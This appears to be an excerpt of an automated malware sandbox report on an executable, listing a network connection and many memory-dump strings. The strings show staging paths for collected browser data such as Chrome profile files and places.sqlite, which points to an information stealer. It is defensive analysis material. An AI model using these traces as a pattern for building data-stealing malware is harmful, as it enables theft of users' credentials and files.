Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49840 version: TLS 1.2

Source: jtfCFDmLdX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.* source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tempAVSD2_TFJlRkh1w.pdb\ source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2027240923.00000000083C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2lmp.pdb source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2027240923.00000000083C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2r source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 3B6N2X~1.SQL3b6N2Xdh3CYwplaces.sqliteWINLOA~1.PDBO-j source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\tempAVSD2_TFJlRkh1w.pdb.bat! source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdbC source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: jtfCFDmLdX.exe, 00000000.00000000.1648365598.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, TE0FN83.exe, 00000001.00000000.1650796309.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Tg9kb35.exe, 00000002.00000002.1667855421.0000000000ED1000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831.dat source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2^ source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ON source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ri source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdbW+ source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2027653774.000000000842C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbobat\DC source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2V source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*exeent,a source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb.ies source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb.batoryIb source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbSEARCH~1 source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: AppLaunch.exe, 00000009.00000002.2020160996.0000000007CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbm source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbO} source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2lmp.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831"Xj source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\winload_prod.pdb\** source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2tings.dat source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2J source: AppLaunch.exe, 00000009.00000002.2031135122.000000000867F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbbe7 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.Temp source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\* source: cmd.exe, 00000014.00000003.2043385440.0000024C2EF9A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.2044956338.0000024C2EF9B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Datanlmp.pdbr source: AppLaunch.exe, 00000009.00000002.2025903423.0000000008285000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2027653774.000000000842C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2019886967.0000000007CB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb.sesq source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2027947130.0000000008473000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdbAcrobat source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2018813681.00000000079FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: AppLaunch.exe, 00000009.00000002.2016956575.0000000007680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdB</sPrinC><sPrinC>GrEbbeV\DoSnloEds< source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2029399466.000000000857D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb. source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\. source: AppLaunch.exe, 00000009.00000002.2023917736.00000000080B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: AppLaunch.exe, 00000009.00000002.2024876554.0000000008182000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb source: AppLaunch.exe, 00000009.00000002.2025195787.00000000081D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\tempCMSD2_TFJlRkh1w\Files\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdbf source: AppLaunch.exe, 00000009.00000002.2020920954.0000000007DBB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdB</sPrinC><sPrinC>GrEbbeV\DeWktoT FiHes< source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp
